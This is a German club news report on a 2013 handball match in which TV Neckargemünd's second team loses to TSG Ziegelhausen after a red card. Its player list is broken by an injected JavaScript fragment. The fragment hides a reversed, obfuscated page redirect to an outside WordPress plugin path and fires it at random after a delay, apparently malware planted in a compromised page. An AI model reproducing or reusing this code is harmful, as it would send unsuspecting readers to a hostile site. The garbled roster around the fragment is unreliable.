Herren II: Erste Niederlage war nicht zu vermeiden

Die zweite Herrenmannschaft des TV Neckargemünd empfing am vergangenen Sonntag die TSG Ziegelhausen zum zweiten Heimspiel der Saison

Neckargemünd, 30.09.2013 (bki) –Dass dieses Spiel ungleich schwerer werden würde als die beiden ersten Partien war spätestens dann klar, als das Fehlen von drei Rückraumspielern bekannt wurde.

Trotzdem erwischte der Gastgeber den besseren Start und konnte sich bis zum 11:10 immer wieder eine knappe Führung erspielen.

Ziegelhausen ging das erste Mal beim Stand zum 11:12 in Führung, jedoch konnte Neckargemünd mit einer 16:14 Führung in die Pause gehen.

Nach dem Seitenwechsel behielt Neckargemünd bis zum 20:18 die Oberhand. Dann nahm das Unheil seinen Lauf. Durch eine Notbremse sah Steffen Sendelbach die rote Karte und dieser Ausfall ließ sich im Rückraum nicht mehr kompensieren.

Ziegelhausen ging mit 22:23 wieder in Führung und gab diese bis zum Ende nicht mehr ab.

Für den TVN spielten:
Im Tor: Bastian Kirschmer, Michael Hechelhammer
Im Feld: Milan Kraus (1), Tim Scriba, Simon Kronbichler (3), Niclas Heinze (4), Steffen Sendelbach (5/3), Istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok Golic (5), Michael Lichtl (3), Ulrich Weitzel (4/1), Frank Weitzel (4)